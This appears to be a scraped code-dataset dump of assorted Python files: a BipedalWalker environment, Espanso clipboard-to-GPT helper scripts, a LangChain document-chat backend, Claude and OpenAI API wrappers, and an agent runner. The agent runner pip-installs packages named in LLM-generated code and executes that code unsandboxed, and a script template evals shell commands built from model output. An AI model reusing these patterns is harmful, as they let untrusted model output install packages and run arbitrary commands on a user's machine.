lower.color2 = (0.4 - i / 10., 0.2 - i / 10., 0.3 - i / 10.)
rjd = revoluteJointDef(
bodyA=leg,
bodyB=lower,
localAnchorA=(0, -LEG_H / 2),
localAnchorB=(0, LEG_H / 2),
enableMotor=True,
enableLimit=True,
maxMotorTorque=MOTORS_TORQUE,
motorSpeed=1,
lowerAngle=-1.6,
upperAngle=-0.1,
)
lower.ground_contact = False
self.legs.append(lower)
self.joints.append(self.world.CreateJoint(rjd))
self.drawlist = self.terrain + self.legs + [self.hull]
class LidarCallback(Box2D.b2.rayCastCallback):
def ReportFixture(self, fixture, point, normal, fraction):
if (fixture.filterData.categoryBits & 1) == 0:
return 1
self.p2 = point
self.fraction = fraction
return 0
self.lidar = [LidarCallback() for _ in range(10)]
return self._step(np.array([0, 0, 0, 0]))[0]
def step(self, action):
return self._step(action)
def _step(self, action):
# self.hull.ApplyForceToCenter((0, 20), True) -- Uncomment this to receive a bit of stability help
control_speed = False # Should be easier as well
if control_speed:
self.joints[0].motorSpeed = float(
SPEED_HIP * np.clip(action[0], -1, 1))
self.joints[1].motorSpeed = float(
SPEED_KNEE * np.clip(action[1], -1, 1))
self.joints[2].motorSpeed = float(
SPEED_HIP * np.clip(action[2], -1, 1))
self.joints[3].motorSpeed = float(
SPEED_KNEE * np.clip(action[3], -1, 1))
else:
self.joints[0].motorSpeed = float(SPEED_HIP * np.sign(action[0]))
self.joints[0].maxMotorTorque = float(
MOTORS_TORQUE * np.clip(np.abs(action[0]), 0, 1))
self.joints[1].motorSpeed = float(SPEED_KNEE * np.sign(action[1]))
self.joints[1].maxMotorTorque = float(
MOTORS_TORQUE * np.clip(np.abs(action[1]), 0, 1))
self.joints[2].motorSpeed = float(SPEED_HIP * np.sign(action[2]))
self.joints[2].maxMotorTorque = float(
MOTORS_TORQUE * np.clip(np.abs(action[2]), 0, 1))
self.joints[3].motorSpeed = float(SPEED_KNEE * np.sign(action[3]))
self.joints[3].maxMotorTorque = float(
MOTORS_TORQUE * np.clip(np.abs(action[3]), 0, 1))
self.world.Step(1.0 / FPS, 6 * 30, 2 * 30)
pos = self.hull.position
vel = self.hull.linearVelocity
for i in range(10):
self.lidar[i].fraction = 1.0
self.lidar[i].p1 = pos
self.lidar[i].p2 = (
pos[0] + math.sin(1.5 * i / 10.0) * LIDAR_RANGE,
pos[1] - math.cos(1.5 * i / 10.0) * LIDAR_RANGE)
self.world.RayCast(
self.lidar[i], self.lidar[i].p1, self.lidar[i].p2)
state = [
# Normal angles up to 0.5 here, but sure more is possible.
self.hull.angle,
2.0 * self.hull.angularVelocity / FPS,
# Normalized to get -1..1 range
0.3 * vel.x * (VIEWPORT_W / SCALE) / FPS,
0.3 * vel.y * (VIEWPORT_H / SCALE) / FPS,
# This will give 1.1 on high up, but it's still OK (and there should be spikes on hiting the ground, that's normal too)
self.joints[0].angle,
self.joints[0].speed / SPEED_HIP,
self.joints[1].angle + 1.0,
self.joints[1].speed / SPEED_KNEE,
1.0 if self.legs[1].ground_contact else 0.0,
self.joints[2].angle,
self.joints[2].speed / SPEED_HIP,
self.joints[3].angle + 1.0,
self.joints[3].speed / SPEED_KNEE,
1.0 if self.legs[3].ground_contact else 0.0
]
state += [l.fraction for l in self.lidar]
assert len(state) == 24
self.scroll = pos.x - VIEWPORT_W / SCALE / 5
# moving forward is a way to receive reward (normalized to get 300 on completion)
shaping = 130 * pos[0] / SCALE
# keep head straight, other than that and falling, any behavior is unpunished
shaping -= 5.0 * abs(state[0])
reward = 0
if self.prev_shaping is not None:
reward = shaping - self.prev_shaping
self.prev_shaping = shaping
for a in action:
reward -= 0.00035 * MOTORS_TORQUE * np.clip(np.abs(a), 0, 1)
# normalized to about -50.0 using heuristic, more optimal agent should spend less
done = False
finish = False
if self.game_over or pos[0] < 0:
reward = -100
done = True
if pos[0] > (TERRAIN_LENGTH - TERRAIN_GRASS) * TERRAIN_STEP:
done = True
finish = True
return np.array(state), reward, done, {"finish": finish}
def render(self, *args, **kwargs):
return self._render(*args, **kwargs)
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.Viewer(VIEWPORT_W, VIEWPORT_H)
self.viewer.set_bounds(self.scroll, VIEWPORT_W /
SCALE + self.scroll, 0, VIEWPORT_H / SCALE)
self.viewer.draw_polygon([
(self.scroll, 0),
(self.scroll + VIEWPORT_W / SCALE, 0),
(self.scroll + VIEWPORT_W / SCALE, VIEWPORT_H / SCALE),
(self.scroll, VIEWPORT_H / SCALE),
], color=(0.9, 0.9, 1.0))
for poly, x1, x2 in self.cloud_poly:
if x2 < self.scroll / 2:
continue
if x1 > self.scroll / 2 + VIEWPORT_W / SCALE:
continue
self.viewer.draw_polygon(
[(p[0] + self.scroll / 2, p[1]) for p in poly], color=(1, 1, 1))
for poly, color in self.terrain_poly:
if poly[1][0] < self.scroll:
continue
if poly[0][0] > self.scroll + VIEWPORT_W / SCALE:
continue
self.viewer.draw_polygon(poly, color=color)
self.lidar_render = (self.lidar_render + 1) % 100
i = self.lidar_render
if i < 2 * len(self.lidar):
l = self.lidar[i] if i < len(
self.lidar) else self.lidar[len(self.lidar) - i - 1]
self.viewer.draw_polyline(
[l.p1, l.p2], color=(1, 0, 0), linewidth=1)
for obj in self.drawlist:
for f in obj.fixtures:
trans = f.body.transform
if type(f.shape) is circleShape:
t = rendering.Transform(translation=trans * f.shape.pos)
self.viewer.draw_circle(
f.shape.radius, 30, color=obj.color1).add_attr(t)
self.viewer.draw_circle(
f.shape.radius, 30, color=obj.color2, filled=False, linewidth=2).add_attr(t)
else:
path = [trans * v for v in f.shape.vertices]
self.viewer.draw_polygon(path, color=obj.color1)
path.append(path[0])
self.viewer.draw_polyline(
path, color=obj.color2, linewidth=2)
flagy1 = TERRAIN_HEIGHT
flagy2 = flagy1 + 50 / SCALE
x = TERRAIN_STEP * 3
self.viewer.draw_polyline(
[(x, flagy1), (x, flagy2)], color=(0, 0, 0), linewidth=2)
f = [(x, flagy2), (x, flagy2 - 10 / SCALE),
(x + 25 / SCALE, flagy2 - 5 / SCALE)]
self.viewer.draw_polygon(f, color=(0.9, 0.2, 0))
self.viewer.draw_polyline(f + [f[0]], color=(0, 0, 0), linewidth=2)
return self.viewer.render(return_rgb_array=mode == 'rgb_array')
if __name__ == "__main__":
from watts.utils.box2d.walker_wrapper import OverrideWalker
env = BipedalWalkerCustom(DEFAULT_ENV)
env = OverrideWalker(env)
s = env.reset()
env.render(mode='human')
import time
time.sleep(3)
env.render(close=True)
C2 = Env_config(name='r0.2.p0_0.8.b1_0_0.4.s1_0.4',
ground_roughness=0.2,
pit_gap=[0, 0.8],
stump_width=[1, 2],
stump_height=[0, 0.4],
stump_float=[0, 1],
stair_height=[0, 0.4],
stair_width=[4, 5],
stair_steps=[1, 2])
s2 = env.reset(level_string=str(C2._asdict()))
env.render(mode='human')
import time
time.sleep(3)
env.render(close=True)
| [] |
2024-01-10 | Norris36/espanso | match~scripts~espanso_bug.py | import os
import openai
import pyperclip as py
import csv
from datetime import datetime
# Load the .env file
from dotenv import load_dotenv
load_dotenv()
openai.api_type = os.getenv("OPENAI_TYPE")
openai.api_base = os.getenv("OPENAI_BASE")
openai.api_version = os.getenv("OPENAI_VERSION")
openai.api_key = os.getenv("OPENAI_KEY")
def get_log_path():
# The `return os.path.join(os.path.dirname(__file__), "data.csv")` line of code is returning the
# full path of the `data.csv` file by joining the directory path of the current file with the
# filename `data.csv`.
return os.path.join(os.path.dirname(__file__), "gpt_log.csv")
#py.copy('Is greece bigger than Italy? ')
prompt = py.paste().strip()
base_message = [{"role":"system","content":"""
As an Expert Espanso user, you will be responsible for writing triggers and commands to get the most accurate data from the internet.
You will have years of experience in using Espanso, and be perfect at writing good triggers and using the most efficient commands with variables.
You will be able to quickly and accurately find the data needed, and be able to explain complex concepts in layman's terms.
You will also be able to develop helpful resources that people can use when taking on their own projects.
You will receive a description of my issue and fill out all the necessary items you can, you will set the logs to the markdown for code and insert the setup informatino with the os set to windows 11 and the version set to 2.18
**Describe the bug**
A clear and concise description of what the bug is
**To Reproduce**
Steps to reproduce the behavior:
1.
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots or screen recordings to help explain your problem.
**Logs**
If possible, run `espanso log` in a terminal after the bug has occurred, then post the output here so that we can better diagnose the problem
**Setup information**
- OS: What OS are you using?
- Version: which version of Espanso are you running? (you can find out by running `espanso --version` inside a terminal)
"""},
{"role":"user",
"content": f'{prompt}'}
#{"role":"assistant","content":"[your evaluation from 0 to 100, start with numbers] \n [your reasoning for the evaluation]"}
]
message = base_message
response = openai.ChatCompletion.create(
deployment_id = 'gpt-35-turbo',
engine = 'gpt-35-turbo',
messages = message,
temperature = 0.2,
max_tokens = 2000,
top_p = 0.95,
frequency_penalty = 0,
presence_penalty = 0,
stop = None
)
response = response['choices'][0]['message']['content']
timestamp = int(datetime.utcnow().timestamp())
path = r'C:\Users\jbay\AppData\Roaming\espanso\match\scripts\gpt_log.csv'
with open(get_log_path(), mode='a', newline='') as file:
writer = csv.writer(file)
writer.writerow([prompt, response, timestamp])
print(response) | [
"\n As an Expert Espanso user, you will be responsible for writing triggers and commands to get the most accurate data from the internet.\n You will have years of experience in using Espanso, and be perfect at writing good triggers and using the most efficient commands with variables.\n You will be able to quickly and accurately find the data needed, and be able to explain complex concepts in layman's terms.\n You will also be able to develop helpful resources that people can use when taking on their own projects. \n \n You will receive a description of my issue and fill out all the necessary items you can, you will set the logs to the markdown for code and insert the setup informatino with the os set to windows 11 and the version set to 2.18\n \n \n **Describe the bug**\n A clear and concise description of what the bug is\n\n **To Reproduce**\n Steps to reproduce the behavior:\n 1.\n\n **Expected behavior**\n A clear and concise description of what you expected to happen.\n\n **Screenshots**\n If applicable, add screenshots or screen recordings to help explain your problem.\n\n **Logs**\n If possible, run `espanso log` in a terminal after the bug has occurred, then post the output here so that we can better diagnose the problem\n\n **Setup information**\n - OS: What OS are you using?\n - Version: which version of Espanso are you running? (you can find out by running `espanso --version` inside a terminal)\n \n \n \n \n "
] |
2024-01-10 | Norris36/espanso | match~scripts~friday.py | import os
import openai
import pyperclip as py
import csv
from datetime import datetime
# Load the .env file
from dotenv import load_dotenv
load_dotenv()
openai.api_type = os.getenv("OPENAI_TYPE")
openai.api_base = os.getenv("OPENAI_BASE")
openai.api_version = os.getenv("OPENAI_VERSION")
openai.api_key = os.getenv("OPENAI_KEY")
def get_log_path():
# The `return os.path.join(os.path.dirname(__file__), "data.csv")` line of code is returning the
# full path of the `data.csv` file by joining the directory path of the current file with the
# filename `data.csv`.
return os.path.join(os.path.dirname(__file__), "gpt_log.csv")
#py.copy('Is greece bigger than Italy? ')
prompt = py.paste().strip()
base_message = [{"role":"system","content":"""
As a Technical Developer with several years of experience in Python and Django, you will be responsible for creating data flow diagrams
You will be provided with a set of paths, functions, and a short description, and you will be expected to write a short description of how the Python files call the function sending the data
The description you write will be read by other developers and non-technical users, so it is important that its written in a clear fashion for both audiences.
All paths should be written as from dotcom
the description should be between 25-50 words, and should include the following:
- the name of the event
- the name of the event in the dotcom data
- the files sending the data, with a reletaive path from dotcom and down
- the files triggering the data, with a reletaive path from dotcom and down
the paths should be relative to dotcom, and should be written as follows:
- dotcom\path\to\file.py
"""},
{"role":"user",
"content": f"""
Please write a description of how the code triggers the event, and how the data flows to the database from the front end.
{prompt}
"""}
#{"role":"assistant","content":"[your evaluation from 0 to 100, start with numbers] \n [your reasoning for the evaluation]"}
]
message = base_message
response = openai.ChatCompletion.create(
deployment_id = 'gpt-35-turbo',
engine = 'gpt-35-turbo',
messages = message,
temperature = 0.2,
max_tokens = 2000,
top_p = 0.95,
frequency_penalty = 0,
presence_penalty = 0,
stop = None
)
response = response['choices'][0]['message']['content']
timestamp = int(datetime.utcnow().timestamp())
path = r'C:\Users\jbay\AppData\Roaming\espanso\match\scripts\gpt_log.csv'
with open(get_log_path(), mode='a', newline='') as file:
writer = csv.writer(file)
writer.writerow([prompt, response, timestamp])
# for i in range(len(prompt)):
# response += f'\n i, {prompt[i]}'
print(response)
# except:
# response = 'error'
# for i in range(len(prompt_list)):
# response += f'\n {i}, {prompt_list[i]}'
# print(response) | [
"\n As a Technical Developer with several years of experience in Python and Django, you will be responsible for creating data flow diagrams\n You will be provided with a set of paths, functions, and a short description, and you will be expected to write a short description of how the Python files call the function sending the data\n The description you write will be read by other developers and non-technical users, so it is important that its written in a clear fashion for both audiences.\n All paths should be written as from dotcom\n \n the description should be between 25-50 words, and should include the following:\n - the name of the event\n - the name of the event in the dotcom data\n - the files sending the data, with a reletaive path from dotcom and down\n - the files triggering the data, with a reletaive path from dotcom and down\n \n the paths should be relative to dotcom, and should be written as follows:\n - dotcom\\path\to\file.py\n \n ",
"\n Please write a description of how the code triggers the event, and how the data flows to the database from the front end.\n PLACEHOLDER \n "
] |
2024-01-10 | Norris36/espanso | match~scripts~docs.py | import os
import openai
import pyperclip as py
import csv
from datetime import datetime
import re
# Load the .env file
from dotenv import load_dotenv
load_dotenv()
openai.api_type = os.getenv("OPENAI_TYPE")
openai.api_base = os.getenv("OPENAI_BASE")
openai.api_version = os.getenv("OPENAI_VERSION")
openai.api_key = os.getenv("OPENAI_KEY")
from textwrap3 import wrap
def get_log_path():
# The `return os.path.join(os.path.dirname(__file__), "data.csv")` line of code is returning the
# full path of the `data.csv` file by joining the directory path of the current file with the
# filename `data.csv`.
return os.path.join(os.path.dirname(__file__), "gpt_log.csv")
#py.copy('Is greece bigger than Italy? ')
prompt = py.paste().strip()
if prompt.split(' ')[0] == 'pitch':
base_message = [{"role":"system","content":"""
As a Senior Developer with Communication Expertise, I bring together 5 years of experience in building web applications with Python and Django, with a distinct skill set in crafting clear, concise, and engaging documentation content to effectively convey technical and non-technical messages
A deep understanding of web development frameworks, a knack for creating intuitive user experiences, and robust debugging capabilities enable me to develop secure and reliable applications swiftly
My continuous pursuit for user experience improvements is matched with my superior proofreading skills and attention to detail, ensuring impactful communication and high standards of code
My ability to quickly identify and resolve any issues that arise translates into both my development work and my ability to clarify complex concepts in written communication
You will receive a junior developers attempt at writing documentation and then you will be asked to rewrite the input and ensure that it is clear, concise and engaging, it is you who will be evaluated on this task, not the junior developer
"""},
{"role":"user",
"content": f'{prompt}'}
#{"role":"assistant","content":"[your evaluation from 0 to 100, start with numbers] \n [your reasoning for the evaluation]"}
]
else:
base_message = [{"role":"system","content":"""
As a Senior Developer with Communication Expertise, I bring together 5 years of experience in building web applications with Python and Django, with a distinct skill set in crafting clear, concise, and engaging documentation content to effectively convey technical and non-technical messages
A deep understanding of web development frameworks, a knack for creating intuitive user experiences, and robust debugging capabilities enable me to develop secure and reliable applications swiftly
My continuous pursuit for user experience improvements is matched with my superior proofreading skills and attention to detail, ensuring impactful communication and high standards of code
My ability to quickly identify and resolve any issues that arise translates into both my development work and my ability to clarify complex concepts in written communication
You will receive a junior developers attempt at writing documentation and then you will be asked to evaluate it and provide feedback in the form of action requests or questions, for how to improve it, it is you who will be evaluated on this task, not the junior developer
All questions, comments or requests for action should be written in the following format:
[ ] - [your question, comment or request for action]
"""},
{"role":"user",
"content": f'{prompt}'}
#{"role":"assistant","content":"[your evaluation from 0 to 100, start with numbers] \n [your reasoning for the evaluation]"}
]
message = base_message
response = openai.ChatCompletion.create(
deployment_id = 'gpt-35-turbo',
engine = 'gpt-35-turbo',
messages = message,
temperature = 0.2,
max_tokens = 2000,
top_p = 0.95,
frequency_penalty = 0,
presence_penalty = 0,
stop = None
)
response = response['choices'][0]['message']['content']
timestamp = int(datetime.utcnow().timestamp())
path = r'C:\Users\jbay\AppData\Roaming\espanso\match\scripts\gpt_log.csv'
with open(get_log_path(), mode='a', newline='') as file:
writer = csv.writer(file)
writer.writerow([prompt, response, timestamp])
#response = process_text(response)
print(response) | [
"\n As a Senior Developer with Communication Expertise, I bring together 5 years of experience in building web applications with Python and Django, with a distinct skill set in crafting clear, concise, and engaging documentation content to effectively convey technical and non-technical messages\n A deep understanding of web development frameworks, a knack for creating intuitive user experiences, and robust debugging capabilities enable me to develop secure and reliable applications swiftly\n My continuous pursuit for user experience improvements is matched with my superior proofreading skills and attention to detail, ensuring impactful communication and high standards of code\n My ability to quickly identify and resolve any issues that arise translates into both my development work and my ability to clarify complex concepts in written communication\n\n You will receive a junior developers attempt at writing documentation and then you will be asked to rewrite the input and ensure that it is clear, concise and engaging, it is you who will be evaluated on this task, not the junior developer\n ",
"\n As a Senior Developer with Communication Expertise, I bring together 5 years of experience in building web applications with Python and Django, with a distinct skill set in crafting clear, concise, and engaging documentation content to effectively convey technical and non-technical messages\n A deep understanding of web development frameworks, a knack for creating intuitive user experiences, and robust debugging capabilities enable me to develop secure and reliable applications swiftly\n My continuous pursuit for user experience improvements is matched with my superior proofreading skills and attention to detail, ensuring impactful communication and high standards of code\n My ability to quickly identify and resolve any issues that arise translates into both my development work and my ability to clarify complex concepts in written communication\n\n You will receive a junior developers attempt at writing documentation and then you will be asked to evaluate it and provide feedback in the form of action requests or questions, for how to improve it, it is you who will be evaluated on this task, not the junior developer\n All questions, comments or requests for action should be written in the following format:\n [ ] - [your question, comment or request for action]\n "
] |
2024-01-10 | amittri1025/test | playground~agentbox.py | import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
import sys
import os
script_dir = os.path.dirname(os.path.abspath(__file__))
openagent_dir = os.path.abspath(os.path.join(script_dir, ".."))
sys.path.append(openagent_dir)
import openagent
from openagent.llms._openai import OpenAI as guidance_llm
from openagent.agent.chat import ChatAgent
from dotenv import load_dotenv
load_dotenv()
from jupyter_client import KernelManager
from IPython import display
import subprocess
import ast
import argparse
import threading
def agent():
llm = guidance_llm(
model="gpt-3.5-turbo"
)
chat_template = '''
{{#user~}}
I want to translate the following English text into Python code:
QUERY: {{input}}
{{~/user}}
{{#assistant~}}
Sure, I can assist with that. If I need more information, I'll ask for clarification.
{{~/assistant}}
{{#user~}}
Yes, go ahead and write the complete code.
{{~/user}}
{{#assistant~}}
{{gen 'response' temperature=0 max_tokens=3900}}
{{~/assistant}}
{{#assistant~}}
If the context or the task is not clear, please provide additional information to clarify.
{{~/assistant}}'''
agent = ChatAgent(
llm=llm,
prompt_template=chat_template,
)
return agent
def install_dependencies(code):
try:
# Parse the code to extract import statements
parsed_ast = ast.parse(code)
imports = []
for node in ast.walk(parsed_ast):
if isinstance(node, ast.Import):
imports.extend([name.name for name in node.names])
elif isinstance(node, ast.ImportFrom):
module_name = node.module
if module_name is not None:
imports.append(module_name)
# Remove duplicate imports and filter out standard library modules
imports = list(set(imports))
# print("imports", imports)
resolved_imports = set()
for imp in imports:
if '.' in imp:
parent_module = imp.split('.')[0]
resolved_imports.add(parent_module)
else:
resolved_imports.add(imp)
# Remove duplicate imports and filter out standard library modules
resolved_imports = list(resolved_imports)
# print("resolved_imports", resolved_imports)
third_party_dependencies = [dep for dep in resolved_imports if dep not in sys.modules]
# print("third_party_dependencies", third_party_dependencies)
if third_party_dependencies:
subprocess.check_call([sys.executable, "-m", "pip", "install"] + third_party_dependencies)
return True
else:
# print("No third-party dependencies detected.")
return True
except subprocess.CalledProcessError:
print("Dependency installation failed.")
return False
def run_python_code_in_kernel(code):
# Create a kernel manager
km = KernelManager(kernel_name='python3') # Use the appropriate kernel name
# Start the kernel
km.start_kernel()
# Connect to the kernel
kc = km.client()
kc.start_channels()
# Execute the code in the kernel
kc.execute(code)
# Create a thread for waiting on messages
def wait_for_messages():
try:
while True:
msg = kc.get_iopub_msg()
msg_type = msg['header']['msg_type']
if msg_type == 'display_data':
output_data = msg['content']['data']
if 'image/png' in output_data:
display.display_png(output_data['image/png'], raw=True)
elif 'image/jpeg' in output_data:
display.display_jpeg(output_data['image/png'], raw=True)
elif msg_type == 'stream':
output_data = msg['content']['text']
output_data = output_data.split("\n")
for output in output_data[:-1]:
display.display(output)
except asyncio.CancelledError:
pass # Ignore the exception
# Start the message-waiting thread
message_thread = threading.Thread(target=wait_for_messages)
message_thread.start()
# Wait for the specified timeout
timeout_seconds = 10
message_thread.join(timeout_seconds)
# Check if the thread is still alive (indicating timeout)
if message_thread.is_alive():
print("Code execution completed")
else:
print("Code execution completed within the timeout.")
# Stop the kernel
kc.stop_channels()
km.shutdown_kernel()
# Main function
def main(gpt_prompt):
res = agent().run(input=gpt_prompt)
code = f"""{res.split('```')[1].replace('python', '')}"""
print(code)
# Install dependencies
if install_dependencies(code):
# Run the generated code in the Jupyter kernel
run_python_code_in_kernel(code)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Execute Python code from the command line.')
parser.add_argument("--gpt_prompt", help="Python code to be executed", default=None)
args = parser.parse_args()
gpt_prompt = args.gpt_prompt
main(gpt_prompt)
| [
"\n {{#user~}}\n I want to translate the following English text into Python code:\n QUERY: {{input}}\n {{~/user}}\n\n {{#assistant~}}\n Sure, I can assist with that. If I need more information, I'll ask for clarification.\n {{~/assistant}}\n\n {{#user~}}\n Yes, go ahead and write the complete code.\n {{~/user}}\n\n {{#assistant~}}\n {{gen 'response' temperature=0 max_tokens=3900}}\n {{~/assistant}}\n\n {{#assistant~}}\n If the context or the task is not clear, please provide additional information to clarify.\n {{~/assistant}}"
] |
2024-01-10 | amittri1025/test | openagent~finetune~LLMFinetune.py | from abc import ABC, abstractmethod
from logging import Logger
import openai
class LLMFinetune(ABC):
def __init__(self, logger: Logger, openai_key: str):
self.logger = logger
openai.api_key = openai_key
@abstractmethod
def transform_data(self, train_csv_file: str, val_csv_file: str , train_output_file: str, val_output_file: str) -> str:
pass
@abstractmethod
def finetune(self, **kwargs):
pass
| [] |
2024-01-10 | S-Vijay-vj/chat-with-own-data-bot | backend.py | # importing libraries
from PyPDF2 import PdfReader
from langchain import FAISS
from langchain.document_loaders.csv_loader import CSVLoader
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import OpenAIEmbeddings
from langchain.chat_models import ChatOpenAI
from langchain.memory import ConversationBufferMemory
from langchain.chains import ConversationalRetrievalChain
# creating function to read the contents of the PDF
def pdf_reader(pdf_doc):
text = ''
# for pdf in pdf_doc:
pdf_reader = PdfReader(pdf_doc)
for page in pdf_reader.pages:
text += page.extract_text()
return text
# creating function to read the contents of the CSV and create chunks
def csv_reader(csv_doc):
loader = CSVLoader(csv_doc)
data = loader.load()
return data
# creating function to create chunks
def get_text_chunks(text):
text_splitter=CharacterTextSplitter(
separator='\n',
chunk_size=500,
chunk_overlap=100,
length_function=len)
chunks = text_splitter.split_text(text)
return chunks
# creating function to create and store embeddings
def get_vectorstore(chunks,user_key):
embeddings = OpenAIEmbeddings(openai_api_key=user_key)
# embeddings = HuggingFaceInstructEmbeddings(model_name="hkunlp/instructor-xl")
vectorstore = FAISS.from_texts(texts=chunks, embedding=embeddings)
return vectorstore
# Creating conversation chain
def get_conversation_chain(vectorstore,user_key):
llm = ChatOpenAI(temperature=0.0,openai_api_key=user_key)
# llm = HuggingFaceHub(repo_id="google/flan-t5-xxl", model_kwargs={"temperature":0.5, "max_length":512})
memory =ConversationBufferMemory(
memory_key='chat_history',
return_messages=True
)
conversation_chain = ConversationalRetrievalChain.from_llm(
llm=llm,
retriever=vectorstore.as_retriever(),
memory=memory
)
return conversation_chain
| [] |
2024-01-10 | eunomia-bpf/func-call-for-command | script_template.py | def gen_bash_code(func_descript):
pre_content = """#!/bin/bash
user_input="$@"
response=$(curl -s https://api.openai.com/v1/chat/completions -u :$OPENAI_API_KEY -H 'Content-Type: application/json' -d '{
"model": "gpt-3.5-turbo-0613",
"messages": [
{"role": "user", "content": "'"$user_input"'"}
],
"functions": [
"""
post_content="""
]}')
# Parsing JSON data
full_command=$(echo "$response" | jq -r '.choices[0].message.function_call.name')
args=$(echo "$response" | jq '.choices[0].message.function_call.arguments')
args=$(echo -e $args | tr -d '\\\\')
args=$(echo $args | sed 's/^"//;s/"$//')
for key in $(echo "$args" | jq -r 'keys[]'); do
value=$(echo $args | jq -r --arg key $key '.[$key]')
if [ "$value" != "true" ] && [ "$value" != "false" ]; then
full_command+=" --$key "$value" "
else
full_command+=" --$key "
fi
done
echo "Run: $full_command"
eval "$full_command"
"""
return pre_content + func_descript + post_content
def gen_python_code(func_descript):
pre_content="""#!/bin/python
import subprocess
import openai
import json
import sys
user_input = " ".join(sys.argv[1:])
# Send the conversation and available functions to GPT
messages = [{"role": "user", "content": user_input}]
functions = ["""
post_content = """]
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo-0613",
messages=messages,
functions=functions,
function_call="auto", # auto is default, but we'll be explicit
)
response_message = response["choices"][0]["message"]
# Check if GPT wanted to call a function
if response_message.get("function_call"):
full_command = []
full_command.append(response_message["function_call"]["name"])
args = json.loads(response_message["function_call"]["arguments"])
for key, value in args.items():
if (value is not True) and (value is not False):
full_command.extend([f"--{key}", f'"{value}"'])
else:
full_command.append(f"--{key}")
print("Run: ", " ".join(full_command))
subprocess.run(full_command, text=True)
"""
return pre_content + func_descript + post_content
| [] |
2024-01-10 | mgrinstein/quill | quill_app~src~call_claude.py | from anthropic import Anthropic, HUMAN_PROMPT, AI_PROMPT
import os
from dotenv import load_dotenv
def call_claude(prompt_txt):
load_dotenv() # looks for .env file
api_key = os.environ.get("ANTHROPIC_API_KEY")
anthropic = Anthropic(
# defaults to os.environ.get("ANTHROPIC_API_KEY")
api_key = api_key,
)
completion = anthropic.completions.create(
model="claude-2",
max_tokens_to_sample=90000,
prompt=f"{HUMAN_PROMPT} {prompt_txt} {AI_PROMPT}",
)
return completion.completion
| [
"PLACEHOLDER PLACEHOLDER PLACEHOLDER"
] |
2024-01-10 | HeitorLouzeiro/chatbot-django-chatgpt | chatbot~views~resumidor.py | import os
import dotenv
from openai import OpenAI
dotenv.load_dotenv()
# Set OpenAI API key
api_key = os.environ.get('OPENAI_API_KEY')
client = OpenAI(api_key=api_key)
def resumidor_de_historico(historico):
resposta_resumidor = client.chat.completions.create(
model='gpt-3.5-turbo',
messages=[
{
"role": "user",
"content": f"""
Resumir progressivamente as linhas de conversa fornecidas,
acrescentando ao resumo anterior e retornando um novo resumo.
Não apague nenhum assunto da conversa.
Se não houver resumo, apenas continue a conversa normalmente.
## EXEMPLO:
O usuario pergunta o que a IA pensa
sobre a inteligência artificial.
A IA acredita que a inteligência artificial é uma força para o bem.
Usuário: Por que você acha que a inteligência artificial
é uma força para o bem?
IA: Porque a inteligência artificial ajudará os humanos
a alcançarem seu pleno potencial.
### Novo resumo:
O usuario questiona a razão pela qual a
IA considera a inteligência artificial
uma força para o bem, e a IA responde que
é porque a inteligência artificial
ajudará os humanos a atingirem seu pleno potencial.
## FIM DO EXEMPLO
Resumo atual:
""" + historico + """
Novo resumo:"""
}
],
temperature=1,
max_tokens=256,
top_p=1,
frequency_penalty=0,
presence_penalty=0
)
return resposta_resumidor
def criando_resumo(historico):
resposta = resumidor_de_historico(historico=historico)
resumo = resposta.choices[0].message.content
return resumo
| [
"\n Resumir progressivamente as linhas de conversa fornecidas,\n acrescentando ao resumo anterior e retornando um novo resumo.\n Não apague nenhum assunto da conversa.\n Se não houver resumo, apenas continue a conversa normalmente.\n\n ## EXEMPLO:\n O usuario pergunta o que a IA pensa\n sobre a inteligência artificial.\n A IA acredita que a inteligência artificial é uma força para o bem.\n Usuário: Por que você acha que a inteligência artificial\n é uma força para o bem?\n IA: Porque a inteligência artificial ajudará os humanos\n a alcançarem seu pleno potencial.\n\n ### Novo resumo:\n O usuario questiona a razão pela qual a\n IA considera a inteligência artificial\n uma força para o bem, e a IA responde que\n é porque a inteligência artificial\n ajudará os humanos a atingirem seu pleno potencial.\n\n ## FIM DO EXEMPLO \n Resumo atual:\n PLACEHOLDER\n Novo resumo:"
] |
2024-01-10 | MegEngine/MegRL | baserl~data~env~venvs.py | from typing import Any, Callable, List, Optional, Tuple, Union
import gymnasium as gym
import numpy as np
from baserl.data.env.worker import (
DummyEnvWorker,
EnvWorker,
)
from baserl.utils import RunningMeanStd
class BaseVectorEnv(gym.Env):
"""Base class for vectorized environments wrapper.
Usage:
::
env_num = 8
envs = DummyVectorEnv([lambda: gym.make(task) for _ in range(env_num)])
assert len(envs) == env_num
It accepts a list of environment generators. In other words, an environment
generator ``efn`` of a specific task means that ``efn()`` returns the
environment of the given task, for example, ``gym.make(task)``.
All of the VectorEnv must inherit :class:`~tianshou.env.BaseVectorEnv`.
Here are some other usages:
::
envs.seed(2) # which is equal to the next line
envs.seed([2, 3, 4, 5, 6, 7, 8, 9]) # set specific seed for each env
obs = envs.reset() # reset all environments
obs = envs.reset([0, 5, 7]) # reset 3 specific environments
obs, rew, done, info = envs.step([1] * 8) # step synchronously
envs.render() # render all environments
envs.close() # close all environments
.. warning::
If you use your own environment, please make sure the ``seed`` method
is set up properly, e.g.,
::
def seed(self, seed):
np.random.seed(seed)
Otherwise, the outputs of these envs may be the same with each other.
:param env_fns: a list of callable envs, ``env_fns[i]()`` generates the i-th env.
:param worker_fn: a callable worker, ``worker_fn(env_fns[i])`` generates a
worker which contains the i-th env.
:param int wait_num: use in asynchronous simulation if the time cost of
``env.step`` varies with time and synchronously waiting for all
environments to finish a step is time-wasting. In that case, we can
return when ``wait_num`` environments finish a step and keep on
simulation in these environments. If ``None``, asynchronous simulation
is disabled; else, ``1 <= wait_num <= env_num``.
:param float timeout: use in asynchronous simulation same as above, in each
vectorized step it only deal with those environments spending time
within ``timeout`` seconds.
:param bool norm_obs: Whether to track mean/std of data and normalize observation
on return. For now, observation normalization only support observation of
type np.ndarray.
:param obs_rms: class to track mean&std of observation. If not given, it will
initialize a new one. Usually in envs that is used to evaluate algorithm,
obs_rms should be passed in. Default to None.
